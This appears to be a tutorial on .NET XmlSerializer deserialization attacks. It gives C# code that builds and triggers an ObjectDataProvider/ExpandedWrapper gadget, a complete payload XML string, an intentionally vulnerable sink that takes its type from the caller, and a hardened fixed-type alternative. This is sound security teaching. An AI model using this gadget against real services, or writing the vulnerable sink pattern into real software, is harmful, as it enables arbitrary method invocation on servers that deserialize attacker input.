.NET Deserialization Vulnerabilities: XmlSerializer

Conditions:

  1. The type used to construct the serializer is attacker-controlled: new XmlSerializer(type controlled)
  2. The input passed to Deserialize is attacker-controlled: serializer.Deserialize(fi controlled)

Both are needed. A serializer constructed for a fixed application type only instantiates that type and the types reachable through its public members, so the attacker must be able to name a type whose object graph contains the gadget.

Two key classes: ObjectDataProvider and ExpandedWrapper

//PresentationFramework.dll  v4.0.0.0
System.Windows.Data.ObjectDataProvider

//System.Data.Services.dll   v4.0.0.0
System.Data.Services.Internal.ExpandedWrapper

ObjectDataProvider is the gadget: it invokes MethodName on ObjectInstance with MethodParameters as soon as those properties are populated, which is exactly what XmlSerializer does while reading the document. ExpandedWrapper<TExpandedElement, TProperty0> is only the carrier: XmlSerializer has to know every concrete type in the graph when it is constructed, and ObjectInstance is typed as object, so the two generic arguments are what bring Class2 and ObjectDataProvider into the serializer's set of known types.

Payload generation:

        // Class2 is the author's helper class (not shown on the page); it exposes a public
        // writeFile(string content, string path) method that ObjectDataProvider will invoke.
        // Requires: using System.IO; using System.Xml.Serialization;
        //           using System.Windows.Data; using System.Data.Services.Internal;
        public static void serializeObjectWithXmlSer()
        {
            // The generic arguments put Class2 and ObjectDataProvider into the serializer's
            // known types, so the object-typed ObjectInstance can carry a Class2 instance.
            ExpandedWrapper<Class2, ObjectDataProvider> eobj = new ExpandedWrapper<Class2, ObjectDataProvider>();
            XmlSerializer serializer = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));
            eobj.ProjectedProperty0 = new ObjectDataProvider();
            eobj.ProjectedProperty0.ObjectInstance = new Class2();      // target object
            eobj.ProjectedProperty0.MethodName = "writeFile";           // method to call on it
            eobj.ProjectedProperty0.MethodParameters.Add("xxxxx");      // first argument
            eobj.ProjectedProperty0.MethodParameters.Add("ser.txt");    // second argument

            // Caveat: ObjectDataProvider refreshes whenever these properties change, so building
            // the gadget as a live object may already invoke writeFile on the generating machine.
            using (TextWriter fo = new StreamWriter("d:/tmp/xmlser.txt"))
            {
                serializer.Serialize(fo, eobj);
            }
        }

Triggering the payload:

        public static void deserializeObjectWithXmlSer()
        {
            // Same type as on the generating side. On a real target this Type must come from
            // attacker-controlled input (condition 1); it is hard-coded here only for the demo.
            XmlSerializer ser = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));
            using (TextReader fi = new StreamReader("d:/tmp/xmlser.txt"))
            {
                // While populating ObjectDataProvider, XmlSerializer sets ObjectInstance, MethodName
                // and MethodParameters; the provider refreshes and calls Class2.writeFile("xxxxx",
                // "ser.txt") before Deserialize returns. The return value is never needed.
                ser.Deserialize(fi);
            }
        }
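The two conditions above as a complete sink, added here as an example that is not part of the original post: VulnerableLoad resolves the root type from a caller-supplied string and then deserializes caller-supplied XML, which is the pattern the post's trigger code stands in for; SafeLoad is the hardened form, built for one fixed DTO. The body of Class2, the Order DTO, the method names and the payload XML text (reconstructed from how XmlSerializer names and writes the post's object graph) are all assumptions.

```csharp
// Added example, not from the original post. Shows the vulnerable sink (attacker picks
// the Type and the XML) next to a hardened one (fixed DTO type). Class2's body, the
// Order DTO and the payload XML are assumptions.
using System;
using System.IO;
using System.Xml.Serialization;
using System.Data.Services.Internal;   // ExpandedWrapper<,>  (System.Data.Services.dll)
using System.Windows.Data;             // ObjectDataProvider  (PresentationFramework.dll)

public class Class2
{
    // Assumed shape of the post's method: writes `content` to `path`.
    public void writeFile(string content, string path) => File.WriteAllText(path, content);
}

// The only type the hardened sink is willing to deserialize (assumed DTO).
public sealed class Order
{
    public string Id { get; set; }
    public int Qty { get; set; }
}

public static class XmlSerSink
{
    // Conditions 1 and 2 together: both the type name and the document come from the caller.
    public static object VulnerableLoad(string typeName, string xml)
    {
        Type t = Type.GetType(typeName, throwOnError: true);   // attacker picks the root type
        var ser = new XmlSerializer(t);
        using (var reader = new StringReader(xml))
            return ser.Deserialize(reader);                     // gadget fires inside here
    }

    // Hardened: the serializer is constructed for one fixed DTO. Any other root element
    // (including ExpandedWrapperOf...) is rejected with InvalidOperationException before
    // a single gadget property is populated.
    public static Order SafeLoad(string xml)
    {
        var ser = new XmlSerializer(typeof(Order));
        using (var reader = new StringReader(xml))
            return (Order)ser.Deserialize(reader);
    }

    // Constructed payload: the XML XmlSerializer produces for the post's object graph
    // (root element name is XmlSerializer's naming of ExpandedWrapper<Class2, ObjectDataProvider>;
    // xsi:type="Class2" is resolvable because Class2 is a generic argument of the root type).
    public const string Payload = @"<?xml version=""1.0"" encoding=""utf-8""?>
<ExpandedWrapperOfClass2ObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance""
                                           xmlns:xsd=""http://www.w3.org/2001/XMLSchema"">
  <ProjectedProperty0>
    <ObjectInstance xsi:type=""Class2"" />
    <MethodName>writeFile</MethodName>
    <MethodParameters>
      <anyType xsi:type=""xsd:string"">xxxxx</anyType>
      <anyType xsi:type=""xsd:string"">ser.txt</anyType>
    </MethodParameters>
  </ProjectedProperty0>
</ExpandedWrapperOfClass2ObjectDataProvider>";

    public static void Main()
    {
        // On a real target this string arrives as text (query string, header, form field...).
        string typeName = typeof(ExpandedWrapper<Class2, ObjectDataProvider>).AssemblyQualifiedName;

        VulnerableLoad(typeName, Payload);
        Console.WriteLine("vulnerable sink: ser.txt written = " + File.Exists("ser.txt"));

        try
        {
            SafeLoad(Payload);
        }
        catch (InvalidOperationException e)
        {
            // Root element does not match <Order>: rejected before ObjectDataProvider is touched.
            Console.WriteLine("hardened sink rejected payload: " + e.Message);
        }
    }
}
```

The fix is not input filtering on the XML; it is removing condition 1. Once the Type handed to the XmlSerializer constructor is fixed at compile time and has no object-typed or XmlInclude-extended members, the document can only populate that DTO, and the gadget's root element is rejected outright.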